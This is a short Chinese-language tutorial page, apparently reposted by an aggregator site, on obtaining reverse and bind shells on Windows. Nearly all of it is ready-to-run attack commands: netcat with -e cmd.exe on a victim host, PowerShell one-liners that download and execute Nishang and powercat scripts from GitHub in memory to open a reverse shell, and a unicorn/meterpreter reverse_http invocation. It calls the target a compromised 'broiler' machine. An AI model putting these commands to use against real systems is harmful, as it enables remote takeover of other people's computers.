Windows 反弹 Shell
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了Windows 反弹 Shell,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含1040字,纯文字阅读大概需要2分钟。
内容图文
![Windows 反弹 Shell](/upload/InfoBanner/zyjiaocheng/960/c43abf1f03764394b8d838b51c0bf0cf.jpg)
NC 反弹 shell
攻击场景:
Victim IP: 192.168.2.10 Attacker IP:192.168.2.11
正向 Shell
我们想要弹回Victim的Shell,使用如下命令:
Victim:nc -lvp 9999 -e cmd.exe
Attacker:nc 192.168.2.10 9999
ps:先在肉鸡上开一个cmd服务,然后在攻击机上进行连接
反向 Shell
Attacker:nc -vlp 9999
Victim:nc 192.168.2.11 9999 -e cmd.exe
ps:先在攻击机上进行监听,然后在肉鸡上给Attacker开一个cmd
PowerShell 反弹 shell
监听主机:nc -vlp 9999
目标执行:内存加载远程脚本,相当于远程代码执行
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 监听主机ip -Port 9999"
powershell -nop -exec bypass -c "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 监听主机ip -p 9999 -e cmd.exe"
python unicorn.py windows/meterpreter/reverse_http 17.10.0.1 4455 msfconsole -r unicorn.rc
内容总结
以上是互联网集市为您收集整理的Windows 反弹 Shell全部内容,希望文章能够帮你解决Windows 反弹 Shell所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。